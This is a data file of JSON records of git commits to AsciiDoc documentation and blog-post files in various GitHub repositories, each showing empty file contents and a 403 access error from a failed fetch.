{"commit":"4caf9ca617b6aa2a95bf7de2e8f8e91db09ce083","subject":"Update 2015-02-24-test.adoc","message":"Update 2015-02-24-test.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-test.adoc","new_file":"_posts\/2015-02-24-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20780534faf2a6bd61ed3e0b57292d3f43c7c947","subject":"Update 2017-04-18-Test.adoc","message":"Update 2017-04-18-Test.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2017-04-18-Test.adoc","new_file":"_posts\/2017-04-18-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77f4c900a12f85d2e814ead13fbfbf8733590e2f","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c2c14446625c7fe5a931fe4f377ef4a92f3dcc5c","subject":"Update 2015-07-15-iOS-9-core-spotlight.adoc","message":"Update 2015-07-15-iOS-9-core-spotlight.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-07-15-iOS-9-core-spotlight.adoc","new_file":"_posts\/2015-07-15-iOS-9-core-spotlight.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90790c131e6b067ce75505b54b548299ce90f4e8","subject":"y2b create post Tesla Model S First Look CES 2012","message":"y2b create post Tesla Model S First Look CES 2012","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-12-Tesla-Model-S-First-Look-CES-2012.adoc","new_file":"_posts\/2012-01-12-Tesla-Model-S-First-Look-CES-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db66033fc0f711d24e96a5a7e6581d42d27a8f83","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a362527597f72e919b5c232ccfad07af4594d61c","subject":"Bz1032836: Remove AS7 from helloworld-osgi code examples in the guide","message":"Bz1032836: Remove AS7 from helloworld-osgi code examples in the guide\n","repos":"DLT-Solutions-JBoss\/jboss-eap-quickstarts,drojokef\/jboss-eap-quickstarts,khajavi\/jboss-eap-quickstarts,bdecoste\/jboss-eap-quickstarts,tobias\/jboss-eap-quickstarts,bostrt\/jboss-eap-quickstarts,rh-asharma\/jboss-eap-quickstarts,bdecoste\/jboss-eap-quickstarts,hslee9397\/jboss-eap-quickstarts,fbricon\/jboss-eap-quickstarts,JaredBurck\/jboss-eap-quickstarts,drojokef\/jboss-eap-quickstarts,codificat\/jboss-eap-quickstarts,rcernich\/jboss-eap-quickstarts,khajavi\/jboss-eap-quickstarts,rcernich\/jboss-eap-quickstarts,1n\/jboss-eap-quickstarts,jgisler\/jboss-eap-quickstarts,trepel\/jboss-eap-quickstarts,codificat\/jboss-eap-quickstarts,1n\/jboss-eap-quickstarts,DLT-Solutions-JBoss\/jboss-eap-quickstarts,jgisler\/jboss-eap-quickstarts,1n\/jboss-eap-quickstarts,fbricon\/jboss-eap-quickstarts,josefkarasek\/jboss-eap-quickstarts,rh-asharma\/jboss-eap-quickstarts,treblereel\/jboss-eap-quickstarts,luksa\/jboss-eap-quickstarts,rsearls\/jboss-eap-quickstarts,jonje\/jboss-eap-quickstarts,trepel\/jboss-eap-quickstarts,hslee9397\/jboss-eap-quickstarts,YaelMendes\/jboss-eap-quickstarts,rcernich\/jboss-eap-quickstarts,rh-asharma\/jboss-eap-quickstarts,khajavi\/jboss-eap-quickstarts,jonje\/jboss-eap-quickstarts,fellipecm\/jboss-eap-quickstarts,hslee9397\/jboss-eap-quickstarts,tobias\/jboss-eap-quickstarts,PavelMikhailouski\/jboss-eap-quickstarts,hkssitcloud\/jboss-eap-quickstarts,vitorsilvalima\/jboss-eap-quickstarts,hguerrero\/jboss-eap-quickstarts,rhatlapa\/jboss-eap-quickstarts,jonje\/jboss-eap-quickstarts,vitorsilvalima\/jboss-eap-quickstarts,rgupta1234\/jboss-eap-quickstarts,treblereel\/jboss-eap-quickstarts,bostrt\/jboss-eap-quickstarts,ivanthelad\/jboss-eap-quickstarts,luksa\/jboss-eap-quickstarts,bdecoste\/jboss-eap-quickstarts,YaelMendes\/jboss-eap-quickstarts,hslee9397\/jboss-eap-quickstarts,codificat\/jboss-eap-quickstarts,hkssitcloud\/jboss-eap-quickstarts,ozekisan\/jboss-eap-quickstarts,fabiomartinsbrrj\/jboss-eap-quickstarts,rhatlapa\/jboss-eap-quickstarts,PavelMikhailouski\/jboss-eap-quickstarts,hguerrero\/jboss-eap-quickstarts,jonje\/jboss-eap-quickstarts,fabiomartinsbrrj\/jboss-eap-quickstarts,rgupta1234\/jboss-eap-quickstarts,drojokef\/jboss-eap-quickstarts,khajavi\/jboss-eap-quickstarts,baranowb\/jboss-eap-quickstarts,mwaleria\/jboss-eap-quickstarts,luksa\/jboss-eap-quickstarts,YaelMendes\/jboss-eap-quickstarts,rhatlapa\/jboss-eap-quickstarts,tobias\/jboss-eap-quickstarts,vitorsilvalima\/jboss-eap-quickstarts,PavelMikhailouski\/jboss-eap-quickstarts,praveen20187\/jboss-eap-quickstarts,rgupta1234\/jboss-eap-quickstarts,luksa\/jboss-eap-quickstarts,praveen20187\/jboss-eap-quickstarts,trepel\/jboss-eap-quickstarts,PavelMikhailouski\/jboss-eap-quickstarts,josefkarasek\/jboss-eap-quickstarts,mwaleria\/jboss-eap-quickstarts,IngServioPantoja\/jboss-eap-quickstarts,praveen20187\/jboss-eap-quickstarts,bdecoste\/jboss-eap-quickstarts,rsearls\/jboss-eap-quickstarts,rgupta1234\/jboss-eap-quickstarts,DLT-Solutions-JBoss\/jboss-eap-quickstarts,hkssitcloud\/jboss-eap-quickstarts,ozekisan\/jboss-eap-quickstarts,PavelMikhailouski\/jboss-eap-quickstarts,tobias\/jboss-eap-quickstarts,rhatlapa\/jboss-eap-quickstarts,Maarc\/jboss-eap-quickstarts,rcernich\/jboss-eap-quickstarts,fbricon\/jboss-eap-quickstarts,IngServioPantoja\/jboss-eap-quickstarts,ivanthelad\/jboss-eap-quickstarts,khajavi\/jboss-eap-quickstarts,vitorsilvalima\/jboss-eap-quickstarts,DLT-Solutions-JBoss\/jboss-eap-quickstarts,mwaleria\/jboss-eap-quickstarts,rgupta1234\/jboss-eap-quickstarts,fabiomartinsbrrj\/jboss-eap-quickstarts,Maarc\/jboss-eap-quickstarts,bostrt\/jboss-eap-quickstarts,trepel\/jboss-eap-quickstarts,jgisler\/jboss-eap-quickstarts,josefkarasek\/jboss-eap-quickstarts,ozekisan\/jboss-eap-quickstarts,IngServioPantoja\/jboss-eap-quickstarts,IngServioPantoja\/jboss-eap-quickstarts,fellipecm\/jboss-eap-quickstarts,fellipecm\/jboss-eap-quickstarts,luksa\/jboss-eap-quickstarts,Maarc\/jboss-eap-quickstarts,hguerrero\/jboss-eap-quickstarts,mwaleria\/jboss-eap-quickstarts,trepel\/jboss-eap-quickstarts,fbricon\/jboss-eap-quickstarts,praveen20187\/jboss-eap-quickstarts,YaelMendes\/jboss-eap-quickstarts,baranowb\/jboss-eap-quickstarts,IngServioPantoja\/jboss-eap-quickstarts,hkssitcloud\/jboss-eap-quickstarts,rcernich\/jboss-eap-quickstarts,jamezp\/quickstart,praveen20187\/jboss-eap-quickstarts,ozekisan\/jboss-eap-quickstarts,jamezp\/quickstart,codificat\/jboss-eap-quickstarts,rhatlapa\/jboss-eap-quickstarts,ivanthelad\/jboss-eap-quickstarts,JaredBurck\/jboss-eap-quickstarts,rsearls\/jboss-eap-quickstarts,jgisler\/jboss-eap-quickstarts,rsearls\/jboss-eap-quickstarts,vitorsilvalima\/jboss-eap-quickstarts,bostrt\/jboss-eap-quickstarts,jamezp\/quickstart,hguerrero\/jboss-eap-quickstarts,treblereel\/jboss-eap-quickstarts,fellipecm\/jboss-eap-quickstarts,fabiomartinsbrrj\/jboss-eap-quickstarts,fbricon\/jboss-eap-quickstarts,josefkarasek\/jboss-eap-quickstarts,tobias\/jboss-eap-quickstarts,YaelMendes\/jboss-eap-quickstarts,Maarc\/jboss-eap-quickstarts,JaredBurck\/jboss-eap-quickstarts,ivanthelad\/jboss-eap-quickstarts,rsearls\/jboss-eap-quickstarts,ivanthelad\/jboss-eap-quickstarts,baranowb\/jboss-eap-quickstarts,bdecoste\/jboss-eap-quickstarts,rh-asharma\/jboss-eap-quickstarts,bostrt\/jboss-eap-quickstarts,treblereel\/jboss-eap-quickstarts,hkssitcloud\/jboss-eap-quickstarts,hguerrero\/jboss-eap-quickstarts,hslee9397\/jboss-eap-quickstarts,Maarc\/jboss-eap-quickstarts,fabiomartinsbrrj\/jboss-eap-quickstarts,jgisler\/jboss-eap-quickstarts,fellipecm\/jboss-eap-quickstarts,drojokef\/jboss-eap-quickstarts,ozekisan\/jboss-eap-quickstarts,drojokef\/jboss-eap-quickstarts,codificat\/jboss-eap-quickstarts,DLT-Solutions-JBoss\/jboss-eap-quickstarts,treblereel\/jboss-eap-quickstarts,rh-asharma\/jboss-eap-quickstarts,josefkarasek\/jboss-eap-quickstarts,jonje\/jboss-eap-quickstarts,mwaleria\/jboss-eap-quickstarts,JaredBurck\/jboss-eap-quickstarts","old_file":"guide\/HelloworldOSGiQuickstart.asciidoc","new_file":"guide\/HelloworldOSGiQuickstart.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fabiomartinsbrrj\/jboss-eap-quickstarts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6ee72ae72db3f3d897bdc47bf7c8a288ddcc5be7","subject":"Fix formatting in update-by-query (#22628)","message":"Fix formatting in update-by-query (#22628)\n\nThe automatic slicing section wasn't displaying the bullet list correctly.","repos":"fernandozhu\/elasticsearch,shreejay\/elasticsearch,mohit\/elasticsearch,naveenhooda2000\/elasticsearch,JackyMai\/elasticsearch,brandonkearby\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,pozhidaevak\/elasticsearch,maddin2016\/elasticsearch,gfyoung\/elasticsearch,s1monw\/elasticsearch,HonzaKral\/elasticsearch,nazarewk\/elasticsearch,artnowo\/elasticsearch,njlawton\/elasticsearch,elasticdog\/elasticsearch,jimczi\/elasticsearch,C-Bish\/elasticsearch,qwerty4030\/elasticsearch,scottsom\/elasticsearch,obourgain\/elasticsearch,bawse\/elasticsearch,vroyer\/elasticassandra,jprante\/elasticsearch,winstonewert\/elasticsearch,uschindler\/elasticsearch,StefanGor\/elasticsearch,markwalkom\/elasticsearch,rajanm\/elasticsearch,mohit\/elasticsearch,njlawton\/elasticsearch,nezirus\/elasticsearch,IanvsPoplicola\/elasticsearch,umeshdangat\/elasticsearch,naveenhooda2000\/elasticsearch,JSCooke\/elasticsearch,glefloch\/elasticsearch,i-am-Nathan\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,maddin2016\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,vroyer\/elassandra,mjason3\/elasticsearch,uschindler\/elasticsearch,maddin2016\/elasticsearch,strapdata\/elassandra,LewayneNaidoo\/elasticsearch,s1monw\/elasticsearch,mikemccand\/elasticsearch,njlawton\/elasticsearch,scorpionvicky\/elasticsearch,artnowo\/elasticsearch,kalimatas\/elasticsearch,Shepard1212\/elasticsearch,brandonkearby\/elasticsearch,IanvsPoplicola\/elasticsearch,gfyoung\/elasticsearch,JackyMai\/elasticsearch,MisterAndersen\/elasticsearch,markwalkom\/elasticsearch,nknize\/elasticsearch,shreejay\/elasticsearch,Helen-Zhao\/elasticsearch,mohit\/elasticsearch,JSCooke\/elasticsearch,LewayneNaidoo\/elasticsearch,wangtuo\/elasticsearch,mikemccand\/elasticsearch,mikemccand\/elasticsearch,LewayneNaidoo\/elasticsearch,rlugojr\/elasticsearch,JSCooke\/elasticsearch,artnowo\/elasticsearch,nezirus\/elasticsearch,pozhidaevak\/elasticsearch,Shepard1212\/elasticsearch,robin13\/elasticsearch,nilabhsagar\/elasticsearch,rajanm\/elasticsearch,kalimatas\/elasticsearch,nilabhsagar\/elasticsearch,rlugojr\/elasticsearch,elasticdog\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,artnowo\/elasticsearch,pozhidaevak\/elasticsearch,qwerty4030\/elasticsearch,wangtuo\/elasticsearch,naveenhooda2000\/elasticsearch,a2lin\/elasticsearch,njlawton\/elasticsearch,ZTE-PaaS\/elasticsearch,fernandozhu\/elasticsearch,geidies\/elasticsearch,s1monw\/elasticsearch,LeoYao\/elasticsearch,MisterAndersen\/elasticsearch,fred84\/elasticsearch,masaruh\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,mjason3\/elasticsearch,LeoYao\/elasticsearch,Stacey-Gammon\/elasticsearch,obourgain\/elasticsearch,i-am-Nathan\/elasticsearch,brandonkearby\/elasticsearch,Helen-Zhao\/elasticsearch,lks21c\/elasticsearch,JSCooke\/elasticsearch,markwalkom\/elasticsearch,nazarewk\/elasticsearch,MisterAndersen\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,mjason3\/elasticsearch,artnowo\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,Helen-Zhao\/elasticsearch,scottsom\/elasticsearch,wenpos\/elasticsearch,scorpionvicky\/elasticsearch,jprante\/elasticsearch,i-am-Nathan\/elasticsearch,alexshadow007\/elasticsearch,GlenRSmith\/elasticsearch,umeshdangat\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,shreejay\/elasticsearch,alexshadow007\/elasticsearch,wenpos\/elasticsearch,mortonsykes\/elasticsearch,sneivandt\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,bawse\/elasticsearch,vroyer\/elasticassandra,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,bawse\/elasticsearch,fred84\/elasticsearch,rajanm\/elasticsearch,ZTE-PaaS\/elasticsearch,bawse\/elasticsearch,wenpos\/elasticsearch,C-Bish\/elasticsearch,mohit\/elasticsearch,a2lin\/elasticsearch,gingerwizard\/elasticsearch,mortonsykes\/elasticsearch,sneivandt\/elasticsearch,pozhidaevak\/elasticsearch,IanvsPoplicola\/elasticsearch,StefanGor\/elasticsearch,LeoYao\/elasticsearch,kalimatas\/elasticsearch,HonzaKral\/elasticsearch,geidies\/elasticsearch,vroyer\/elassandra,masaruh\/elasticsearch,s1monw\/elasticsearch,alexshadow007\/elasticsearch,winstonewert\/elasticsearch,nazarewk\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,StefanGor\/elasticsearch,obourgain\/elasticsearch,nknize\/elasticsearch,Shepard1212\/elasticsearch,JackyMai\/elasticsearch,coding0011\/elasticsearch,ZTE-PaaS\/elasticsearch,nilabhsagar\/elasticsearch,a2lin\/elasticsearch,gfyoung\/elasticsearch,LewayneNaidoo\/elasticsearch,StefanGor\/elasticsearch,pozhidaevak\/elasticsearch,elasticdog\/elasticsearch,ZTE-PaaS\/elasticsearch,masaruh\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,mjason3\/elasticsearch,geidies\/elasticsearch,shreejay\/elasticsearch,rajanm\/elasticsearch,jimczi\/elasticsearch,maddin2016\/elasticsearch,jprante\/elasticsearch,elasticdog\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,lks21c\/elasticsearch,mikemccand\/elasticsearch,brandonkearby\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,C-Bish\/elasticsearch,jprante\/elasticsearch,mjason3\/elasticsearch,rlugojr\/elasticsearch,robin13\/elasticsearch,LeoYao\/elasticsearch,gfyoung\/elasticsearch,markwalkom\/elasticsearch,GlenRSmith\/elasticsearch,fernandozhu\/elasticsearch,IanvsPoplicola\/elasticsearch,qwerty4030\/elasticsearch,i-am-Nathan\/elasticsearch,scorpionvicky\/elasticsearch,Helen-Zhao\/elasticsearch,Stacey-Gammon\/elasticsearch,nilabhsagar\/elasticsearch,scottsom\/elasticsearch,uschindler\/elasticsearch,alexshadow007\/elasticsearch,sneivandt\/elasticsearch,wenpos\/elasticsearch,s1monw\/elasticsearch,masaruh\/elasticsearch,mohit\/elasticsearch,geidies\/elasticsearch,glefloch\/elasticsearch,nezirus\/elasticsearch,sneivandt\/elasticsearch,rlugojr\/elasticsearch,obourgain\/elasticsearch,markwalkom\/elasticsearch,HonzaKral\/elasticsearch,scottsom\/elasticsearch,sneivandt\/elasticsearch,LeoYao\/elasticsearch,mortonsykes\/elasticsearch,obourgain\/elasticsearch,a2lin\/elasticsearch,fernandozhu\/elasticsearch,glefloch\/elasticsearch,rlugojr\/elasticsearch,shreejay\/elasticsearch,StefanGor\/elasticsearch,fernandozhu\/elasticsearch,coding0011\/elasticsearch,njlawton\/elasticsearch,nezirus\/elasticsearch,naveenhooda2000\/elasticsearch,robin13\/elasticsearch,JSCooke\/elasticsearch,strapdata\/elassandra,naveenhooda2000\/elasticsearch,vroyer\/elasticassandra,bawse\/elasticsearch,jimczi\/elasticsearch,nezirus\/elasticsearch,mortonsykes\/elasticsearch,a2lin\/elasticsearch,nazarewk\/elasticsearch,Shepard1212\/elasticsearch,gingerwizard\/elasticsearch,maddin2016\/elasticsearch,elasticdog\/elasticsearch,nknize\/elasticsearch,lks21c\/elasticsearch,winstonewert\/elasticsearch,C-Bish\/elasticsearch,HonzaKral\/elasticsearch,alexshadow007\/elasticsearch,wenpos\/elasticsearch,jimczi\/elasticsearch,jprante\/elasticsearch,geidies\/elasticsearch,JackyMai\/elasticsearch,vroyer\/elassandra,IanvsPoplicola\/elasticsearch,gingerwizard\/elasticsearch,Shepard1212\/elasticsearch,robin13\/elasticsearch,MisterAndersen\/elasticsearch,rajanm\/elasticsearch,lks21c\/elasticsearch,winstonewert\/elasticsearch,ZTE-PaaS\/elasticsearch,markwalkom\/elasticsearch,lks21c\/elasticsearch,wangtuo\/elasticsearch,Helen-Zhao\/elasticsearch,masaruh\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,C-Bish\/elasticsearch,LewayneNaidoo\/elasticsearch,glefloch\/elasticsearch,Stacey-Gammon\/elasticsearch,scottsom\/elasticsearch,nilabhsagar\/elasticsearch,mortonsykes\/elasticsearch,wangtuo\/elasticsearch,i-am-Nathan\/elasticsearch,nazarewk\/elasticsearch,mikemccand\/elasticsearch,Stacey-Gammon\/elasticsearch,winstonewert\/elasticsearch,strapdata\/elassandra,qwerty4030\/elasticsearch,geidies\/elasticsearch,fred84\/elasticsearch,MisterAndersen\/elasticsearch,gfyoung\/elasticsearch,JackyMai\/elasticsearch,wangtuo\/elasticsearch,glefloch\/elasticsearch,brandonkearby\/elasticsearch,Stacey-Gammon\/elasticsearch,fred84\/elasticsearch","old_file":"docs\/reference\/docs\/update-by-query.asciidoc","new_file":"docs\/reference\/docs\/update-by-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0e79ac78892368860332f0a3969a108e6687e9ab","subject":"more WiP","message":"more WiP\n","repos":"EMBL-EBI-SUBS\/subs,EMBL-EBI-SUBS\/subs","old_file":"subs-api\/src\/main\/resources\/docs\/how_to_submit_data_programatically.adoc","new_file":"subs-api\/src\/main\/resources\/docs\/how_to_submit_data_programatically.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMBL-EBI-SUBS\/subs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ae37627752730812993e6d5bf435946343904d4","subject":"- Initial README","message":"- Initial README\n","repos":"semkr\/workshops,davidkirwan\/workshops,davidkirwan\/workshops,semkr\/workshops","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/davidkirwan\/workshops.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e1e8fc8f13dd8668fdcebb1c7e45cd057023ffd9","subject":"Change VersionEye badge style.","message":"Change VersionEye badge style.\n","repos":"ryotan\/kaba-vault,ryotan\/kaba-vault","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ryotan\/kaba-vault.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4f782f37bc03f68c71ac3456c787b15b164a56c0","subject":"Update 2016-03-13-c-c.adoc","message":"Update 2016-03-13-c-c.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2016-03-13-c-c.adoc","new_file":"_posts\/2016-03-13-c-c.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edd30e7010d9c36bb22f25c35f06381caa20c85d","subject":"Update 2017-12-23-First-Anniversary.adoc","message":"Update 2017-12-23-First-Anniversary.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-12-23-First-Anniversary.adoc","new_file":"_posts\/2017-12-23-First-Anniversary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f5f7714b2d05e3f277a3e48f47f39b6674e435d3","subject":"Update 2016-02-19-Friday-Favorites-What-is-your-favorite-Disney-queue.adoc","message":"Update 2016-02-19-Friday-Favorites-What-is-your-favorite-Disney-queue.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-19-Friday-Favorites-What-is-your-favorite-Disney-queue.adoc","new_file":"_posts\/2016-02-19-Friday-Favorites-What-is-your-favorite-Disney-queue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c65368ec2813a5a1dba30772fb2357c10978801","subject":"Create AUTHORS.adoc","message":"Create AUTHORS.adoc","repos":"GYMY-16\/gymybook,GYMY-16\/gymybook","old_file":"AUTHORS.adoc","new_file":"AUTHORS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GYMY-16\/gymybook.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b016be1b1f6a74e77c07827a353168f720f29852","subject":"add guide index page","message":"add guide index page\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/guides.adoc","new_file":"content\/guides\/guides.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ca6834c38995a9c289201d35d7ad7ff178d3268b","subject":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","message":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f0cbafc928628e8f4a49bde955363208850d4f3","subject":"y2b create post The Smartphone Battery Life World Champion - 10,000mAh!","message":"y2b create post The Smartphone Battery Life World Champion - 10,000mAh!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-09-The-Smartphone-Battery-Life-World-Champion--10000mAh.adoc","new_file":"_posts\/2017-11-09-The-Smartphone-Battery-Life-World-Champion--10000mAh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99652d730a54759218a0dd75a14816e1c34aeec3","subject":"doc\/release notes v2.28","message":"doc\/release notes v2.28\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"744074668c36cb20873e0ab8ad80df314c4cdd35","subject":"build instructions","message":"build instructions\n","repos":"HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j","old_file":"enterprise\/README.asciidoc","new_file":"enterprise\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HuangLS\/neo4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"19bcb02a1b08edb0e55a5b66dad47808c9cd51b7","subject":"Update 2016-02-04-Second-Post.adoc","message":"Update 2016-02-04-Second-Post.adoc","repos":"Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io","old_file":"_posts\/2016-02-04-Second-Post.adoc","new_file":"_posts\/2016-02-04-Second-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kif11\/Kif11.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f7048821e2bd2d1964460910c5c69888ed926f7","subject":"Update 2016-04-10-tcpip-stack.adoc","message":"Update 2016-04-10-tcpip-stack.adoc","repos":"dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io","old_file":"_posts\/2016-04-10-tcpip-stack.adoc","new_file":"_posts\/2016-04-10-tcpip-stack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dingboopt\/dingboopt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d7cba35f2d04cbe2d69e7aa4e75bfd49d94ffc3","subject":"deref","message":"deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/06\/18\/deref.adoc","new_file":"content\/news\/2021\/06\/18\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"de27b48759f3bc40b8e83891c5de5388342f577f","subject":"Adding missing archive folder.","message":"Adding missing archive 